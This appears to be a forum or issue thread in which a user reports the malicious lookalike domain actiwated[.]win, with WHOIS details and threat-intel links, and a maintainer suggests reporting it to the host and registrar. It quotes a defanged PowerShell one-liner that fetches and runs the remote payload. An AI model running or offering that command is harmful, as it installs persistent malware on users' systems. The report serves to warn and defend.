Attention! malicious domain actiwated[.]win.

[Dominator-3000]

Hello!

I found the malicious domain actiwated[.]win.

When executed from PowerShell irm https://get.actiwated[.]win | iex, it creates the svchostw32 service and persists in the system!

Domain Information:

Domain Name: actiwated[.]win
Registry Domain ID: REDACTED FOR PRIVACY
Registrar WHOIS Server: whois.gathernames.com
Registrar URL: https://www.gname.com/
Updated Date: 2025-12-26T10:15:27Z
Creation Date: 2025-10-27T10:15:24Z Registry Expiry Date: 2026-10-27T10:15:24Z

More information:
https://www.virustotal.com/gui/file/80f959b0969f8680c9b5ecc55cef44d7c208435f10918fb7412fc95beabab06a/relations
https://opentip.kaspersky.com/80F959B0969F8680C9B5ECC55CEF44D7C208435F10918FB7412FC95BEABAB06A/static

[ave9858]

Hi, thanks for reporting. We recently started investigating this malware after someone shared a different URL that executes this same payload. All we can really do is ask the community to report all the URLs involved to the hosting providers and domain registrars. For example, the URL you reported is hosted on Cloudflare so you could report it to them, and also to GNAME to try and get the domain taken down.